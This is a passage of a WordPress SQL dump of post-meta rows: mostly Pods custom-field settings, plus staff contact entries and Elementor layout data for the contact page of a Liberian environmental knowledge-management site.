File'),(15351,2390,'file_wp_gallery_output','0'),(15352,2390,'file_wp_gallery_link','post'),(15353,2390,'file_wp_gallery_columns','1'),(15354,2390,'file_wp_gallery_random_sort','0'),(15355,2390,'file_wp_gallery_size','thumbnail'),(15356,2390,'oembed_width','0'),(15357,2390,'oembed_height','0'),(15358,2390,'oembed_show_preview','0'),(15359,2390,'oembed_restrict_providers','0'),(15360,2390,'oembed_enabled_providers_amazoncn','0'),(15361,2390,'oembed_enabled_providers_amazoncouk','0'),(15362,2390,'oembed_enabled_providers_amazoncom','0'),(15363,2390,'oembed_enabled_providers_amazoncomau','0'),(15364,2390,'oembed_enabled_providers_amazonin','0'),(15365,2390,'oembed_enabled_providers_animotocom','0'),(15366,2390,'oembed_enabled_providers_cloudupcom','0'),(15367,2390,'oembed_enabled_providers_collegehumorcom','0'),(15368,2390,'oembed_enabled_providers_crowdsignalcom','0'),(15369,2390,'oembed_enabled_providers_dailymotioncom','0'),(15370,2390,'oembed_enabled_providers_facebookcom','0'),(15371,2390,'oembed_enabled_providers_flickrcom','0'),(15372,2390,'oembed_enabled_providers_hulucom','0'),(15373,2390,'oembed_enabled_providers_imgurcom','0'),(15374,2390,'oembed_enabled_providers_instagramcom','0'),(15375,2390,'oembed_enabled_providers_issuucom','0'),(15376,2390,'oembed_enabled_providers_kickstartercom','0'),(15377,2390,'oembed_enabled_providers_meetupcom','0'),(15378,2390,'oembed_enabled_providers_mixcloudcom','0'),(15379,2390,'oembed_enabled_providers_redditcom','0'),(15380,2390,'oembed_enabled_providers_reverbnationcom','0'),(15381,2390,'oembed_enabled_providers_screencastcom','0'),(15382,2390,'oembed_enabled_providers_scribdcom','0'),(15383,2390,'oembed_enabled_providers_slidesharenet','0'),(15384,2390,'oembed_enabled_providers_smugmugcom','0'),(15385,2390,'oembed_enabled_providers_someecardscom','0'),(15386,2390,'oembed_enabled_providers_soundcloudcom','0'),(15387,2390,'oembed_enabled_providers_speakerdeckcom','0'),(15388,2390,'oembed_enabled_providers_spotifycom','0'),(15389,2390,'oembed_enabled_providers_tedcom','0'),(15390,2390,'oembed_enabled_providers_tumblrcom','0'),(15391,2390,'oembed_enabled_providers_twittercom','0'),(15392,2390,'oembed_enabled_providers_vimeocom','0'),(15393,2390,'oembed_enabled_providers_wordpresscom','0'),(15394,2390,'oembed_enabled_providers_wordpresstv','0'),(15395,2390,'oembed_enabled_providers_youtubecom','0'),(15396,2390,'pick_format_type','single'),(15397,2390,'pick_format_single','dropdown'),(15398,2390,'pick_format_multi','checkbox'),(15399,2390,'pick_allow_add_new','1'),(15400,2390,'pick_taggable','0'),(15401,2390,'pick_show_icon','1'),(15402,2390,'pick_show_edit_link','1'),(15403,2390,'pick_show_view_link','1'),(15404,2390,'pick_limit','0'),(15405,2390,'pick_user_role','a:0:{}'),(15406,2390,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(15407,2390,'boolean_format_type','checkbox'),(15408,2390,'boolean_yes_label','Yes'),(15409,2390,'boolean_no_label','No'),(15410,2390,'admin_only','0'),(15411,2390,'restrict_role','0'),(15412,2390,'restrict_capability','0'),(15413,2390,'hidden','0'),(15414,2390,'read_only','0'),(15415,2390,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(15416,2390,'rest_read','0'),(15417,2390,'rest_write','0'),(15418,2390,'rest_pick_response','array'),(15419,2390,'rest_pick_depth','2'),(15420,2391,'_elementor_controls_usage','a:0:{}'),(15421,2391,'type','wysiwyg'),(15422,2391,'required','0'),(15423,2391,'text_allow_shortcode','0'),(15424,2391,'text_allow_html','0'),(15425,2391,'text_allowed_html_tags','strong em a ul ol li b i'),(15426,2391,'text_max_length','255'),(15427,2391,'website_format','normal'),(15428,2391,'website_allow_port','0'),(15429,2391,'website_clickable','0'),(15430,2391,'website_new_window','0'),(15431,2391,'website_max_length','255'),(15432,2391,'website_html5','0'),(15433,2391,'phone_format','999-999-9999 x999'),(15434,2391,'phone_enable_phone_extension','1'),(15435,2391,'phone_max_length','25'),(15436,2391,'phone_html5','0'),(15437,2391,'email_max_length','255'),(15438,2391,'email_html5','1'),(15439,2391,'password_max_length','255'),(15440,2391,'paragraph_allow_html','1'),(15441,2391,'paragraph_oembed','0'),(15442,2391,'paragraph_wptexturize','1'),(15443,2391,'paragraph_convert_chars','1'),(15444,2391,'paragraph_wpautop','1'),(15445,2391,'paragraph_allow_shortcode','0'),(15446,2391,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(15447,2391,'paragraph_max_length','0'),(15448,2391,'wysiwyg_editor','tinymce'),(15449,2391,'wysiwyg_media_buttons','1'),(15450,2391,'wysiwyg_oembed','0'),(15451,2391,'wysiwyg_wptexturize','1'),(15452,2391,'wysiwyg_convert_chars','1'),(15453,2391,'wysiwyg_wpautop','1'),(15454,2391,'wysiwyg_allow_shortcode','0'),(15455,2391,'code_allow_shortcode','0'),(15456,2391,'code_max_length','0'),(15457,2391,'datetime_type','format'),(15458,2391,'datetime_format','mdy'),(15459,2391,'datetime_time_type','12'),(15460,2391,'datetime_time_format','h_mma'),(15461,2391,'datetime_time_format_24','hh_mm'),(15462,2391,'datetime_allow_empty','1'),(15463,2391,'datetime_html5','0'),(15464,2391,'date_type','format'),(15465,2391,'date_format','mdy'),(15466,2391,'date_allow_empty','1'),(15467,2391,'date_html5','0'),(15468,2391,'time_type','12'),(15469,2391,'time_format','h_mma'),(15470,2391,'time_format_24','hh_mm'),(15471,2391,'time_allow_empty','1'),(15472,2391,'time_html5','0'),(15473,2391,'number_format_type','number'),(15474,2391,'number_format','i18n'),(15475,2391,'number_decimals','0'),(15476,2391,'number_format_soft','0'),(15477,2391,'number_step','1'),(15478,2391,'number_min','0'),(15479,2391,'number_max','100'),(15480,2391,'number_max_length','12'),(15481,2391,'currency_format_type','number'),(15482,2391,'currency_format_sign','usd'),(15483,2391,'currency_format_placement','before'),(15484,2391,'currency_format','i18n'),(15485,2391,'currency_decimals','2'),(15486,2391,'currency_decimal_handling','none'),(15487,2391,'currency_step','1'),(15488,2391,'currency_min','0'),(15489,2391,'currency_max','1000'),(15490,2391,'currency_max_length','12'),(15491,2391,'file_format_type','single'),(15492,2391,'file_uploader','attachment'),(15493,2391,'file_attachment_tab','upload'),(15494,2391,'file_edit_title','1'),(15495,2391,'file_show_edit_link','0'),(15496,2391,'file_linked','0'),(15497,2391,'file_limit','0'),(15498,2391,'file_restrict_filesize','10MB'),(15499,2391,'file_type','images'),(15500,2391,'file_field_template','rows'),(15501,2391,'file_add_button','Add File'),(15502,2391,'file_modal_title','Attach a file'),(15503,2391,'file_modal_add_button','Add File'),(15504,2391,'file_wp_gallery_output','0'),(15505,2391,'file_wp_gallery_link','post'),(15506,2391,'file_wp_gallery_columns','1'),(15507,2391,'file_wp_gallery_random_sort','0'),(15508,2391,'file_wp_gallery_size','thumbnail'),(15509,2391,'oembed_width','0'),(15510,2391,'oembed_height','0'),(15511,2391,'oembed_show_preview','0'),(15512,2391,'oembed_restrict_providers','0'),(15513,2391,'oembed_enabled_providers_amazoncn','0'),(15514,2391,'oembed_enabled_providers_amazoncouk','0'),(15515,2391,'oembed_enabled_providers_amazoncom','0'),(15516,2391,'oembed_enabled_providers_amazoncomau','0'),(15517,2391,'oembed_enabled_providers_amazonin','0'),(15518,2391,'oembed_enabled_providers_animotocom','0'),(15519,2391,'oembed_enabled_providers_cloudupcom','0'),(15520,2391,'oembed_enabled_providers_collegehumorcom','0'),(15521,2391,'oembed_enabled_providers_crowdsignalcom','0'),(15522,2391,'oembed_enabled_providers_dailymotioncom','0'),(15523,2391,'oembed_enabled_providers_facebookcom','0'),(15524,2391,'oembed_enabled_providers_flickrcom','0'),(15525,2391,'oembed_enabled_providers_hulucom','0'),(15526,2391,'oembed_enabled_providers_imgurcom','0'),(15527,2391,'oembed_enabled_providers_instagramcom','0'),(15528,2391,'oembed_enabled_providers_issuucom','0'),(15529,2391,'oembed_enabled_providers_kickstartercom','0'),(15530,2391,'oembed_enabled_providers_meetupcom','0'),(15531,2391,'oembed_enabled_providers_mixcloudcom','0'),(15532,2391,'oembed_enabled_providers_redditcom','0'),(15533,2391,'oembed_enabled_providers_reverbnationcom','0'),(15534,2391,'oembed_enabled_providers_screencastcom','0'),(15535,2391,'oembed_enabled_providers_scribdcom','0'),(15536,2391,'oembed_enabled_providers_slidesharenet','0'),(15537,2391,'oembed_enabled_providers_smugmugcom','0'),(15538,2391,'oembed_enabled_providers_someecardscom','0'),(15539,2391,'oembed_enabled_providers_soundcloudcom','0'),(15540,2391,'oembed_enabled_providers_speakerdeckcom','0'),(15541,2391,'oembed_enabled_providers_spotifycom','0'),(15542,2391,'oembed_enabled_providers_tedcom','0'),(15543,2391,'oembed_enabled_providers_tumblrcom','0'),(15544,2391,'oembed_enabled_providers_twittercom','0'),(15545,2391,'oembed_enabled_providers_vimeocom','0'),(15546,2391,'oembed_enabled_providers_wordpresscom','0'),(15547,2391,'oembed_enabled_providers_wordpresstv','0'),(15548,2391,'oembed_enabled_providers_youtubecom','0'),(15549,2391,'pick_format_type','single'),(15550,2391,'pick_format_single','dropdown'),(15551,2391,'pick_format_multi','checkbox'),(15552,2391,'pick_allow_add_new','1'),(15553,2391,'pick_taggable','0'),(15554,2391,'pick_show_icon','1'),(15555,2391,'pick_show_edit_link','1'),(15556,2391,'pick_show_view_link','1'),(15557,2391,'pick_limit','0'),(15558,2391,'pick_user_role','a:0:{}'),(15559,2391,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(15560,2391,'boolean_format_type','checkbox'),(15561,2391,'boolean_yes_label','Yes'),(15562,2391,'boolean_no_label','No'),(15563,2391,'admin_only','0'),(15564,2391,'restrict_role','0'),(15565,2391,'restrict_capability','0'),(15566,2391,'hidden','0'),(15567,2391,'read_only','0'),(15568,2391,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(15569,2391,'rest_read','0'),(15570,2391,'rest_write','0'),(15571,2391,'rest_pick_response','array'),(15572,2391,'rest_pick_depth','2'),(15573,2392,'_elementor_controls_usage','a:0:{}'),(15574,2392,'type','phone'),(15575,2392,'required','0'),(15576,2392,'text_allow_shortcode','0'),(15577,2392,'text_allow_html','0'),(15578,2392,'text_allowed_html_tags','strong em a ul ol li b i'),(15579,2392,'text_max_length','255'),(15580,2392,'website_format','normal'),(15581,2392,'website_allow_port','0'),(15582,2392,'website_clickable','0'),(15583,2392,'website_new_window','0'),(15584,2392,'website_max_length','255'),(15585,2392,'website_html5','0'),(15586,2392,'phone_format','international'),(15587,2392,'phone_enable_phone_extension','1'),(15588,2392,'phone_max_length','25'),(15589,2392,'phone_html5','0'),(15590,2392,'email_max_length','255'),(15591,2392,'email_html5','0'),(15592,2392,'password_max_length','255'),(15593,2392,'paragraph_allow_html','1'),(15594,2392,'paragraph_oembed','0'),(15595,2392,'paragraph_wptexturize','1'),(15596,2392,'paragraph_convert_chars','1'),(15597,2392,'paragraph_wpautop','1'),(15598,2392,'paragraph_allow_shortcode','0'),(15599,2392,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(15600,2392,'paragraph_max_length','0'),(15601,2392,'wysiwyg_editor','tinymce'),(15602,2392,'wysiwyg_media_buttons','1'),(15603,2392,'wysiwyg_oembed','0'),(15604,2392,'wysiwyg_wptexturize','1'),(15605,2392,'wysiwyg_convert_chars','1'),(15606,2392,'wysiwyg_wpautop','1'),(15607,2392,'wysiwyg_allow_shortcode','0'),(15608,2392,'code_allow_shortcode','0'),(15609,2392,'code_max_length','0'),(15610,2392,'datetime_type','format'),(15611,2392,'datetime_format','mdy'),(15612,2392,'datetime_time_type','12'),(15613,2392,'datetime_time_format','h_mma'),(15614,2392,'datetime_time_format_24','hh_mm'),(15615,2392,'datetime_allow_empty','1'),(15616,2392,'datetime_html5','0'),(15617,2392,'date_type','format'),(15618,2392,'date_format','mdy'),(15619,2392,'date_allow_empty','1'),(15620,2392,'date_html5','0'),(15621,2392,'time_type','12'),(15622,2392,'time_format','h_mma'),(15623,2392,'time_format_24','hh_mm'),(15624,2392,'time_allow_empty','1'),(15625,2392,'time_html5','0'),(15626,2392,'number_format_type','number'),(15627,2392,'number_format','i18n'),(15628,2392,'number_decimals','0'),(15629,2392,'number_format_soft','0'),(15630,2392,'number_step','1'),(15631,2392,'number_min','0'),(15632,2392,'number_max','100'),(15633,2392,'number_max_length','12'),(15634,2392,'currency_format_type','number'),(15635,2392,'currency_format_sign','usd'),(15636,2392,'currency_format_placement','before'),(15637,2392,'currency_format','i18n'),(15638,2392,'currency_decimals','2'),(15639,2392,'currency_decimal_handling','none'),(15640,2392,'currency_step','1'),(15641,2392,'currency_min','0'),(15642,2392,'currency_max','1000'),(15643,2392,'currency_max_length','12'),(15644,2392,'file_format_type','single'),(15645,2392,'file_uploader','attachment'),(15646,2392,'file_attachment_tab','upload'),(15647,2392,'file_edit_title','1'),(15648,2392,'file_show_edit_link','0'),(15649,2392,'file_linked','0'),(15650,2392,'file_limit','0'),(15651,2392,'file_restrict_filesize','10MB'),(15652,2392,'file_type','images'),(15653,2392,'file_field_template','rows'),(15654,2392,'file_add_button','Add File'),(15655,2392,'file_modal_title','Attach a file'),(15656,2392,'file_modal_add_button','Add File'),(15657,2392,'file_wp_gallery_output','0'),(15658,2392,'file_wp_gallery_link','post'),(15659,2392,'file_wp_gallery_columns','1'),(15660,2392,'file_wp_gallery_random_sort','0'),(15661,2392,'file_wp_gallery_size','thumbnail'),(15662,2392,'oembed_width','0'),(15663,2392,'oembed_height','0'),(15664,2392,'oembed_show_preview','0'),(15665,2392,'oembed_restrict_providers','0'),(15666,2392,'oembed_enabled_providers_amazoncn','0'),(15667,2392,'oembed_enabled_providers_amazoncouk','0'),(15668,2392,'oembed_enabled_providers_amazoncom','0'),(15669,2392,'oembed_enabled_providers_amazoncomau','0'),(15670,2392,'oembed_enabled_providers_amazonin','0'),(15671,2392,'oembed_enabled_providers_animotocom','0'),(15672,2392,'oembed_enabled_providers_cloudupcom','0'),(15673,2392,'oembed_enabled_providers_collegehumorcom','0'),(15674,2392,'oembed_enabled_providers_crowdsignalcom','0'),(15675,2392,'oembed_enabled_providers_dailymotioncom','0'),(15676,2392,'oembed_enabled_providers_facebookcom','0'),(15677,2392,'oembed_enabled_providers_flickrcom','0'),(15678,2392,'oembed_enabled_providers_hulucom','0'),(15679,2392,'oembed_enabled_providers_imgurcom','0'),(15680,2392,'oembed_enabled_providers_instagramcom','0'),(15681,2392,'oembed_enabled_providers_issuucom','0'),(15682,2392,'oembed_enabled_providers_kickstartercom','0'),(15683,2392,'oembed_enabled_providers_meetupcom','0'),(15684,2392,'oembed_enabled_providers_mixcloudcom','0'),(15685,2392,'oembed_enabled_providers_redditcom','0'),(15686,2392,'oembed_enabled_providers_reverbnationcom','0'),(15687,2392,'oembed_enabled_providers_screencastcom','0'),(15688,2392,'oembed_enabled_providers_scribdcom','0'),(15689,2392,'oembed_enabled_providers_slidesharenet','0'),(15690,2392,'oembed_enabled_providers_smugmugcom','0'),(15691,2392,'oembed_enabled_providers_someecardscom','0'),(15692,2392,'oembed_enabled_providers_soundcloudcom','0'),(15693,2392,'oembed_enabled_providers_speakerdeckcom','0'),(15694,2392,'oembed_enabled_providers_spotifycom','0'),(15695,2392,'oembed_enabled_providers_tedcom','0'),(15696,2392,'oembed_enabled_providers_tumblrcom','0'),(15697,2392,'oembed_enabled_providers_twittercom','0'),(15698,2392,'oembed_enabled_providers_vimeocom','0'),(15699,2392,'oembed_enabled_providers_wordpresscom','0'),(15700,2392,'oembed_enabled_providers_wordpresstv','0'),(15701,2392,'oembed_enabled_providers_youtubecom','0'),(15702,2392,'pick_format_type','single'),(15703,2392,'pick_format_single','dropdown'),(15704,2392,'pick_format_multi','checkbox'),(15705,2392,'pick_allow_add_new','1'),(15706,2392,'pick_taggable','0'),(15707,2392,'pick_show_icon','1'),(15708,2392,'pick_show_edit_link','1'),(15709,2392,'pick_show_view_link','1'),(15710,2392,'pick_limit','0'),(15711,2392,'pick_user_role','a:0:{}'),(15712,2392,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(15713,2392,'boolean_format_type','checkbox'),(15714,2392,'boolean_yes_label','Yes'),(15715,2392,'boolean_no_label','No'),(15716,2392,'admin_only','0'),(15717,2392,'restrict_role','0'),(15718,2392,'restrict_capability','0'),(15719,2392,'hidden','0'),(15720,2392,'read_only','0'),(15721,2392,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(15722,2392,'rest_read','0'),(15723,2392,'rest_write','0'),(15724,2392,'rest_pick_response','array'),(15725,2392,'rest_pick_depth','2'),(15726,2393,'_edit_lock','1573874166:1'),(15727,2393,'_edit_last','1'),(15728,2393,'_elementor_controls_usage','a:0:{}'),(15730,2393,'admin_only',''),(15731,2393,'restrict_capability',''),(15732,2393,'capability_allowed',''),(15735,2390,'unique','0'),(15736,2390,'text_repeatable','0'),(15737,2391,'unique','0'),(15738,2391,'email_repeatable','0'),(15739,2392,'unique','0'),(15740,2392,'phone_repeatable','0'),(15741,2388,'menu_icon','dashicons-businessperson'),(15742,2395,'_edit_lock','1573874235:1'),(15743,2395,'_edit_last','1'),(15745,2395,'_elementor_controls_usage','a:0:{}'),(15746,2395,'organization','Environmental Protection Agency'),(15747,2395,'position','MEAs Officer/UNCBD Focal Point'),(15748,2395,'e-mail','<a href=\"mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a>'),(15749,2395,'phone',''),(15755,2401,'_elementor_controls_usage','a:0:{}'),(15756,2401,'type','file'),(15757,2401,'pick_object','custom-simple'),(15758,2401,'required','0'),(15759,2401,'text_allow_shortcode','0'),(15760,2401,'text_allow_html','0'),(15761,2401,'text_allowed_html_tags','strong em a ul ol li b i'),(15762,2401,'text_max_length','255'),(15763,2401,'website_format','normal'),(15764,2401,'website_allow_port','0'),(15765,2401,'website_clickable','0'),(15766,2401,'website_new_window','0'),(15767,2401,'website_max_length','255'),(15768,2401,'website_html5','0'),(15769,2401,'phone_format','999-999-9999 x999'),(15770,2401,'phone_enable_phone_extension','1'),(15771,2401,'phone_max_length','25'),(15772,2401,'phone_html5','0'),(15773,2401,'email_max_length','255'),(15774,2401,'email_html5','0'),(15775,2401,'password_max_length','255'),(15776,2401,'paragraph_allow_html','1'),(15777,2401,'paragraph_oembed','0'),(15778,2401,'paragraph_wptexturize','1'),(15779,2401,'paragraph_convert_chars','1'),(15780,2401,'paragraph_wpautop','1'),(15781,2401,'paragraph_allow_shortcode','0'),(15782,2401,'paragraph_allowed_html_tags','strong em a ul ol li b i'),(15783,2401,'paragraph_max_length','0'),(15784,2401,'wysiwyg_editor','tinymce'),(15785,2401,'wysiwyg_media_buttons','1'),(15786,2401,'wysiwyg_oembed','0'),(15787,2401,'wysiwyg_wptexturize','1'),(15788,2401,'wysiwyg_convert_chars','1'),(15789,2401,'wysiwyg_wpautop','1'),(15790,2401,'wysiwyg_allow_shortcode','0'),(15791,2401,'code_allow_shortcode','0'),(15792,2401,'code_max_length','0'),(15793,2401,'datetime_type','format'),(15794,2401,'datetime_format','mdy'),(15795,2401,'datetime_time_type','12'),(15796,2401,'datetime_time_format','h_mma'),(15797,2401,'datetime_time_format_24','hh_mm'),(15798,2401,'datetime_allow_empty','1'),(15799,2401,'datetime_html5','0'),(15800,2401,'date_type','format'),(15801,2401,'date_format','mdy'),(15802,2401,'date_allow_empty','1'),(15803,2401,'date_html5','0'),(15804,2401,'time_type','12'),(15805,2401,'time_format','h_mma'),(15806,2401,'time_format_24','hh_mm'),(15807,2401,'time_allow_empty','1'),(15808,2401,'time_html5','0'),(15809,2401,'number_format_type','number'),(15810,2401,'number_format','i18n'),(15811,2401,'number_decimals','0'),(15812,2401,'number_format_soft','0'),(15813,2401,'number_step','1'),(15814,2401,'number_min','0'),(15815,2401,'number_max','100'),(15816,2401,'number_max_length','12'),(15817,2401,'currency_format_type','number'),(15818,2401,'currency_format_sign','usd'),(15819,2401,'currency_format_placement','before'),(15820,2401,'currency_format','i18n'),(15821,2401,'currency_decimals','2'),(15822,2401,'currency_decimal_handling','none'),(15823,2401,'currency_step','1'),(15824,2401,'currency_min','0'),(15825,2401,'currency_max','1000'),(15826,2401,'currency_max_length','12'),(15827,2401,'file_format_type','single'),(15828,2401,'file_uploader','attachment'),(15829,2401,'file_attachment_tab','upload'),(15830,2401,'file_edit_title','0'),(15831,2401,'file_show_edit_link','0'),(15832,2401,'file_linked','0'),(15833,2401,'file_limit','0'),(15834,2401,'file_restrict_filesize','10MB'),(15835,2401,'file_type','images'),(15836,2401,'file_field_template','rows'),(15837,2401,'file_add_button','Add Photo'),(15838,2401,'file_modal_title','Attach a Photo'),(15839,2401,'file_modal_add_button','Add Photo'),(15840,2401,'file_wp_gallery_output','0'),(15841,2401,'file_wp_gallery_link','post'),(15842,2401,'file_wp_gallery_columns','1'),(15843,2401,'file_wp_gallery_random_sort','0'),(15844,2401,'file_wp_gallery_size','thumbnail'),(15845,2401,'oembed_width','0'),(15846,2401,'oembed_height','0'),(15847,2401,'oembed_show_preview','0'),(15848,2401,'oembed_restrict_providers','0'),(15849,2401,'oembed_enabled_providers_amazoncn','0'),(15850,2401,'oembed_enabled_providers_amazoncouk','0'),(15851,2401,'oembed_enabled_providers_amazoncom','0'),(15852,2401,'oembed_enabled_providers_amazoncomau','0'),(15853,2401,'oembed_enabled_providers_amazonin','0'),(15854,2401,'oembed_enabled_providers_animotocom','0'),(15855,2401,'oembed_enabled_providers_cloudupcom','0'),(15856,2401,'oembed_enabled_providers_collegehumorcom','0'),(15857,2401,'oembed_enabled_providers_crowdsignalcom','0'),(15858,2401,'oembed_enabled_providers_dailymotioncom','0'),(15859,2401,'oembed_enabled_providers_facebookcom','0'),(15860,2401,'oembed_enabled_providers_flickrcom','0'),(15861,2401,'oembed_enabled_providers_hulucom','0'),(15862,2401,'oembed_enabled_providers_imgurcom','0'),(15863,2401,'oembed_enabled_providers_instagramcom','0'),(15864,2401,'oembed_enabled_providers_issuucom','0'),(15865,2401,'oembed_enabled_providers_kickstartercom','0'),(15866,2401,'oembed_enabled_providers_meetupcom','0'),(15867,2401,'oembed_enabled_providers_mixcloudcom','0'),(15868,2401,'oembed_enabled_providers_redditcom','0'),(15869,2401,'oembed_enabled_providers_reverbnationcom','0'),(15870,2401,'oembed_enabled_providers_screencastcom','0'),(15871,2401,'oembed_enabled_providers_scribdcom','0'),(15872,2401,'oembed_enabled_providers_slidesharenet','0'),(15873,2401,'oembed_enabled_providers_smugmugcom','0'),(15874,2401,'oembed_enabled_providers_someecardscom','0'),(15875,2401,'oembed_enabled_providers_soundcloudcom','0'),(15876,2401,'oembed_enabled_providers_speakerdeckcom','0'),(15877,2401,'oembed_enabled_providers_spotifycom','0'),(15878,2401,'oembed_enabled_providers_tedcom','0'),(15879,2401,'oembed_enabled_providers_tumblrcom','0'),(15880,2401,'oembed_enabled_providers_twittercom','0'),(15881,2401,'oembed_enabled_providers_vimeocom','0'),(15882,2401,'oembed_enabled_providers_wordpresscom','0'),(15883,2401,'oembed_enabled_providers_wordpresstv','0'),(15884,2401,'oembed_enabled_providers_youtubecom','0'),(15885,2401,'pick_format_type','single'),(15886,2401,'pick_format_single','dropdown'),(15887,2401,'pick_format_multi','checkbox'),(15888,2401,'pick_allow_add_new','1'),(15889,2401,'pick_taggable','0'),(15890,2401,'pick_show_icon','1'),(15891,2401,'pick_show_edit_link','1'),(15892,2401,'pick_show_view_link','1'),(15893,2401,'pick_limit','0'),(15894,2401,'pick_user_role','a:0:{}'),(15895,2401,'pick_post_status','a:1:{i:0;s:7:\"publish\";}'),(15896,2401,'boolean_format_type','checkbox'),(15897,2401,'boolean_yes_label','Yes'),(15898,2401,'boolean_no_label','No'),(15899,2401,'admin_only','0'),(15900,2401,'restrict_role','0'),(15901,2401,'restrict_capability','0'),(15902,2401,'hidden','0'),(15903,2401,'read_only','0'),(15904,2401,'roles_allowed','a:1:{i:0;s:13:\"administrator\";}'),(15905,2401,'rest_read','0'),(15906,2401,'rest_write','0'),(15907,2401,'rest_pick_response','array'),(15908,2401,'rest_pick_depth','2'),(15909,2391,'wysiwyg_repeatable','0'),(15912,2401,'unique','0'),(15914,2395,'_pods_photo','a:1:{i:0;i:2313;}'),(15920,2390,'old_name','titleposition'),(15923,2393,'pod_reference','a:1:{s:3:\"pod\";s:16:\"knowledge_broker\";}'),(15925,2395,'photo','2313'),(15926,2410,'_elementor_controls_usage','a:0:{}'),(15927,2410,'organization','Environmental Protection Agency'),(15928,2410,'position','MEAs Coordinator/UNFCCC Focal Point'),(15929,2410,'e-mail','<a href=\"mailto:bkarmorh@epa.gov.lr\">bkarmorh@epa.gov.lr</a>'),(15930,2410,'phone',''),(15933,2410,'_dp_original','2395'),(15934,2410,'_edit_lock','1573874533:1'),(15935,2410,'_edit_last','1'),(15936,2410,'_pods_photo','a:1:{i:0;i:2359;}'),(15937,2410,'photo','2359'),(15938,2411,'_elementor_controls_usage','a:0:{}'),(15939,2411,'organization','Environmental Protection Agency'),(15940,2411,'position','GIS Coordinator/UNCCD Focal Point'),(15941,2411,'e-mail','<a href=\"mailto:bjallah@epa.gov.lr\">bjallah@epa.gov.lr</a>'),(15942,2411,'phone','+231-770-433258'),(15946,2411,'_dp_original','2410'),(15947,2411,'_edit_lock','1573874820:1'),(15948,2411,'_edit_last','1'),(15950,2411,'_pods_photo','a:1:{i:0;i:2357;}'),(15952,2411,'photo','2357'),(15960,2413,'_elementor_edit_mode','builder'),(15961,2413,'_elementor_template_type','wp-page'),(15962,2413,'_elementor_version','2.7.5'),(15963,2413,'_wp_page_template','default'),(15964,2413,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/